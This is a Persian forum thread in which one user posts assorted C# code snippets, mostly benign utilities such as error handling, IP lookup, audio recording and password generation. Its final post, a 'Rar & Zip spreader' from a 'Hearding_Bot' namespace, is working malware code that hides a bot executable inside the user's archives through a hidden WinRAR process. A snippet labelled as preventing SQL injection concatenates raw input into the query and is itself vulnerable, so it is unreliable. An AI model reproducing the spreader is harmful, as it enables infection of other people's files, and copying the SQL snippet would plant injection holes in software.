0

مجموعه برنامه ها به زبان سی شارپ

 
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

مجموعه برنامه ها به زبان سی شارپ

سلام 

در این تاپیک تمامی کد های مفید و برنامه های کوچک و بزرگ نوشته شده قرار داده می شود . 
تمامی پست ها باید دارای توضیح فارسی باشد .
و در صورت برداشت از جایی منبع ذکر شود ...


موفق باشید

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  7:08 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

Smile جلوگیری از SQL Injection
این نمونه کد برای جلوگیری از SQL Injection است.
 
کد PHP:
                p = "insert into Table_Name (Field_Name) values ('" + txt22.Text + " + " )"; 
                SqlCommand cmd = new SqlCommand(p, con); 
                
                cmd.Parameters.AddWithValue("@name_kafposh", txtkafposh.Text); 
                cmd.Parameters.AddWithValue("@code", i); 
                cmd.Parameters.AddWithValue("@Column _Name", txt1.Text); 
                cmd.Parameters.AddWithValue("@Column _Name", txt2.Text); 
                 
                con.Open(); 
                cmd.ExecuteNonQuery(); 
                con.Close();  

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:11 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

یه مثال ساده از مدیریت کردن خطا در سی شارپ
برنامه یک کنسول اپلیکیشن میباشه 
 
کد:
using System; 
using System.Collections.Generic;
using System.Linq;
using System.Text;
 
namespace ConsoleApplication3
{
    class Program
    {
        static void Main(string[] args)
        {
            // این برنامه دو عدد رو میگیره و بر هم تقسیم میکنه 
            //حالا اگه ما عدد اول را 3 و عدد دوم را یک حروف وارد کنیم.خطا رخ میده 
            // و ما خطا رو مدیریت کردیم
            // یا اگر عدد بزرگت وارد کنیم سر ریز بافر رخ میده و مدیریت شده
            Console.WriteLine("Enter 2 number : ");
            string s1 = Console.ReadLine();//گرفتن یک عدد
            string s2 = Console.ReadLine();//گرفتن عدد دوم 
            //------------------------------------------//
            try//سعی کن انجام بدی دستورات زیر را 
            {
                int a1 = Int32.Parse(s1);
                int a2 = Int32.Parse(s2);
                int a3 = a1 / a2;
                Console.WriteLine(a3);
            }// تا اینجا مربوط میشه به قسمت بالا 
            catch (FormatException ex)//اگر به حای عدد .حروف بدهیم این قسمت اجرا میشه
            {
                Console.WriteLine("error format");// نمایش میده این متن رو 
            }
            catch (DivideByZeroException ex)//اگر خطایی تقیسیم بر صفر داشته باشیم این قسمت اجرا میشه
            {
                Console.WriteLine("error / [0]");
            }
            catch (OverflowException ex)// اگر عدد وارده مثلا 4444444444 باشه سر ریز بافر شده و این قسمت
            {
                Console.WriteLine("sar riz bufer");
            }
            catch (Exception ex)//اینم بیس کلی..هر کدام از خطا بالا نبود این قسمت اجرا میشه
            {
                Console.WriteLine("Call to admin plase");
            }
            Console.ReadLine();
 
 
        }
    }
}

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:11 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

محاسبه مساحت دایره
 
 
کد:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
 
namespace WindowsFormsApplication22
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
 
        private void button1_Click(object sender, EventArgs e)
        {
            
        }
 
 
        private void button3_Click(object sender, EventArgs e)
        {
            double d1;
            int az;
            try
            {
                az = int.Parse(textBox1.Text);
                d1 = masahat(az);
                MessageBox.Show("masahat  = " + d1);
            }
            catch (Exception)
            {
                MessageBox.Show("خطا ");
                {
           
            
 
                }
            }
        }
                       
            private double masahat(double a1)
            {
                double s1;
                double s2;
                s1 = a1 * a1;
                s2 = s1 * Math.PI;
                return s2;
                {
 
                }
            }
                    }
}

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:12 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

Smile نمایش ip سیستم ...
کد PHP:
using System; 
using System.Net; 
 
namespace IPADDRESS 
    class Program 
    { 
        static void Main(string[] args) 
        { 
            String strHostName = string.Empty; 
            if (args.Length == 0) 
            {                 
                /* First get the host name of local machine.*/ 
                strHostName = Dns.GetHostName(); 
                Console.WriteLine("Local Machine's Host Name: " + strHostName); 
            } 
            else 
            { 
                strHostName = args[0]; 
            } 
            /* Then using host name, get the IP address list..*/ 
            IPHostEntry ipEntry = Dns.GetHostByName(strHostName); 
            IPAddress[] addr = ipEntry.AddressList; 
            for (int i = 0; i < addr.Length; i++) 
            { 
                Console.WriteLine("IP Address {0}: {1} ", i, addr[i].ToString()); 
            } 
            Console.ReadLine(); 
        } 
    } 
}  

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:12 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

آموزش ساخت کلاس و رسم دایره و قطاع
http://s3.picofile.com/file/76806190...awPie.rar.html
 
آموزش ساخت کلاس کره و محاسبه حجم و مساحت آن با توجه به شعاع
 
آموزش ساخت کلاس استوانه و محاسبه حجم و مساحت جانبی با توجه به شعاع و ارتفاع
 
آموزش رسم دایره با وارد کردن مختصات و دو شعاع
 
آموزش رسم قطاع دایره با توجه به دو زاویه
 
 
در روزهای آینده کاملتر خواهد شد چون بعضی قسمت ها را بیشتر می توان گسترش داد

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:12 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

نرم افزار Record صدا
سلام دوستان 
یه سورس داشتم گفتم بزارم شاید ب کارتون بیاد
این نرم افزار از طریق میکروفن صداتونو رکورد میکنه/...
 
ابتدا Name Space های زیر رو صدا بزنید
 
کد PHP:
[LEFT] 
using Microsoft.VisualBasic.Devices; 
using Microsoft.VisualBasic; 
using System.Runtime.InteropServices; 
 
[/LEFT]  
تابع API زیر رو تو کلاس بنویسید
 
 
 
[DllImport("winmm.dll", EntryPoint = "mciSendStringA", 
CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
 
private static extern int mciSendString(string lpstrCommand, 
string lpstrReturnString, int uReturnLength, int hwndCallback);
 
سه تا دکمه میسازید به اسم های
Rcord
Save/Stop
Read
 
خوب کد دکمه ها به شرح زیر هست
 
کد PHP:
[LEFT] 
// record from microphone 
mciSendString("open new Type waveaudio Alias recsound", "", 0, 0); 
mciSendString("record recsound", "", 0, 0); 
 
[/LEFT]  
 
// stop and save
mciSendString("save recsound c:\\record.wav", "", 0, 0);
mciSendString("close recsound ", "", 0, 0);
Computer c = new Computer();
c.Audio.Stop();
 
 
Computer computer = new Computer();
computer.Audio.Play("c:\\record.wav", AudioPlayMode.Background);
 
موفق باشید

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:12 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

دوستان این کد خیلی مفید بود گفتم بزارم حال کنید:
 
تعیین زبان فارسی به عنوان پیش فرض در فرم ها در صورتی که زبان فارسی بر روی سیستم عامل نصب باشد کافی است در form load از کد زیر استفاده نماییم:
 
تعیین زبان فارسی به عنوان پیش فرض در فرم ها در صورتی که زبان فارسی بر روی سیستم عامل نصب باشد کافی است در form load از کد زیر استفاده نماییم:
 
کد PHP:
private void Form1_Load(object sender, EventArgs e) 
 
 
foreach (InputLanguage lng in InputLanguage.InstalledInputLanguages) 
 
 
if (lng.LayoutName.ToLower() == "farsi") 
 
 
InputLanguage.CurrentInputLanguage = lng; 
 
 
 
}  

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:13 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

Arrow فایل مورد نظر را بساز و بنویس
سلام قطعه کدی براتون میزارم انشاالله مفید باشه تاپیکشو پیدا نکردم اینجا میزارم جاش بده مدیران انتقال بدن
 
مرسی
 
 
 
کد PHP:
using System; 
using System.Collections.Generic; 
using System.Linq; 
using System.Text; 
using System.IO; 
 
namespace all_project 
    class Program 
    { 
        static void Main(string[] args) 
        { 
  StreamWriter sw; 
            sw = new StreamWriter("c:\\oooooooo.txt"); 
            sw.WriteLine("goooooo"); 
            sw.Close(); 
       } 
 
    } 
}  

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:14 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

Arrow ساختن dll
سلام دوستان کدی که براتون نوشتم مربوط هست به ساخت DLL به زبان#c
کد PHP:
using System; 
using System.Collections.Generic; 
using System.Linq; 
using System.Text; 
using System.Data; 
using System.Data.SqlClient; 
using System.Configuration; 
namespace DLL 
    public class SqlQuery 
    { 
        private static string connectionstring; 
        static SqlQuery() 
        { 
            connectionstring = ConfigurationManager.ConnectionStrings[1].ConnectionString; 
        } 
        public static void ExecuteNonQuery(string sql) 
        { 
            SqlConnection objCon = null; 
            try 
            { 
                objCon = new SqlConnection(connectionstring); 
                SqlCommand objcommand = new SqlCommand(sql, objCon); 
                objcommand.CommandType = CommandType.Text; 
                objcommand.CommandText = sql; 
                objCon.Open(); 
                objcommand.ExecuteNonQuery(); 
            } 
            finally 
            { 
                if (objCon != null) 
                { 
                    objCon.Close(); 
                    objCon.Dispose(); 
                } 
 
            } 
        } 
    } 
}  

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:14 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

Arrow لیست برنامه ها نصب شده
برای بدست آورن لیست برنامه های نصب شده در سیستم میتونید از این کد استفاده کنید 
 
امیدوارم مفید باشه
کد PHP:
private void GetInstalledPrograms() 
        { 
            RegistryKey localmachine = Registry.LocalMachine; 
            RegistryKey Uninstall = localmachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Uninst  all"); 
  
            foreach (string key in Uninstall.GetSubKeyNames()) 
            { 
                RegistryKey activeKey = Uninstall.OpenSubKey(key); 
                string displayName = (string)activeKey.GetValue("DisplayName"); 
  
                if (!String.IsNullOrEmpty(displayName)) 
                    listBox1.Items.Add(displayName); 
            } 
        }  

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:14 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

تبدیل یک IP به HostName و برعکس
کد PHP:
using System.Net;  
کد PHP:
public string ConvertIP2HostName(string ip) 
    IPHostEntry iphost = Dns.GetHostEntry(ip); 
    return iphost.HostName; 
}  
کد PHP:
public string HostNameToIP(string hostName) 
    IPHostEntry iphost = System.Net.Dns.GetHostEntry(hostName); 
    IPAddress[] addresses = iphost.AddressList; 
    StringBuilder addressList = new StringBuilder(); 
    foreach (IPAddress address in addresses) 
    { 
        addressList.AppendFormat("IP Address: {0};", address.ToString()); 
    } 
    return addressList.ToString(); 
}  
 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:14 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

Arrow ایجاد رمزهای تصادفی توسط فضای System.Security.Cryptography
سلام اینم از کد امروز میتونید رمزهای تصادفی تولید کنید امیدوارم مفید باشه
کد PHP:
public static string CreateRandomEncryptedPassword(int PasswordLen) 
        { 
            String allowedChars = 
            "abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNOPQRSTUVWXY  Z0123456789"; 
            Byte[] randomBytes = new Byte[PasswordLen]; 
            RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider(); 
            rng.GetBytes(randomBytes); 
            char[] chars = new char[PasswordLen]; 
            int allowedCharCount = allowedChars.Length; 
            for (int i = 0; i < PasswordLen; i++) 
            { 
                chars[i] = allowedChars[(int)randomBytes[i] % allowedCharCount]; 
            } 
            return new string(chars); 
        }  

 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:15 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

Simple Minecraft Skin Stealer
سورس یه استیلر 
کد PHP:
Code: 
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click 
  Dim dir As String 
  Dim myWebClient As New System.Net.WebClient 
  dir = Application.StartupPath & "\" & TextBox1.Text & ".png" 
  myWebClient.DownloadFile("http://s3.amazonaws.com/MinecraftSkins/" & TextBox1.Text & ".png", dir) 
    End Sub  

 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:15 AM
تشکرات از این پست
siryahya
siryahya
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158642
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:مجموعه برنامه ها به زبان سی شارپ

Rar & Zip spreader
کد PHP:
using System; 
using System.Collections.Generic; 
using System.Text; 
using System.IO; 
using System.Diagnostics; 
using System.Runtime.InteropServices; 
 
namespace Hearding_Bot 
    class RAR 
    { 
                [DllImport("kernel32.dll", CharSet = CharSet.Auto)] 
        public static extern int GetShortPathName([MarshalAs(UnmanagedType.LPTStr)] string path, [MarshalAs(UnmanagedType.LPTStr)] StringBuilder shortPath, int shortPathLength); 
        public static List<string> Paths = new List<string>(); 
        public static List<string> Directories = new List<string>(); 
        public static bool checkRAR() 
        { 
            if (!Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFi​les) + "\\WinRAR")) 
            { 
                //WinRAR is not installed 
                return false; 
            } 
            else { return true; } 
        } 
        public static bool PopulateList() 
        { 
            if (Paths.Count - 1 <= 0) 
            { 
                Paths.Add(Environment.GetFolderPath(Environment.SpecialFolder.Desktop)); 
                Paths.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments))​; 
                Paths.Add(Environment.GetFolderPath(Environment.SpecialFolder.Personal)); 
                return true; 
            } 
            else{ return true; } 
        } 
        public static void Search() 
        { 
            foreach (string directories in Paths) 
            { 
                foreach (string dir in Directory.GetDirectories(directories)) 
                { 
                    Directories.Add(dir); 
                } 
            } 
            Sift(); 
        } 
        public static void Sift() 
        { 
            foreach (string dir in Directories) 
            { 
                foreach (string file in Directory.GetFiles(dir)) 
                { 
                    if (file.EndsWith(".rar") || file.EndsWith(".zip")) 
                    { 
                        Inject(file); 
                    } 
                } 
            } 
        } 
        public static void Inject(string Inject) 
        { 
            string rarPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\WinRAR\\WinRAR.exe"; 
 
            StringBuilder exePath = new StringBuilder(255); 
            GetShortPathName(Path.Combine(Config.installPath, Config.installFile), exePath, exePath.Capacity); 
            string path = exePath.ToString(); 
 
            StringBuilder archivePath = new StringBuilder(255); 
            GetShortPathName(Inject, archivePath, archivePath.Capacity); 
 
            try 
            { 
                ProcessStartInfo startInfo = new ProcessStartInfo(); 
                startInfo.Arguments = " a " + archivePath + " " + path; 
                startInfo.FileName = rarPath; 
                startInfo.WindowStyle = ProcessWindowStyle.Hidden; 
                Process.Start(startInfo); 
                //successful spread 
            } 
            catch { //error } 
        } 
    } 
}  

 

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

جمعه 25 اردیبهشت 1394  11:15 AM
تشکرات از این پست
دسترسی سریع به انجمن ها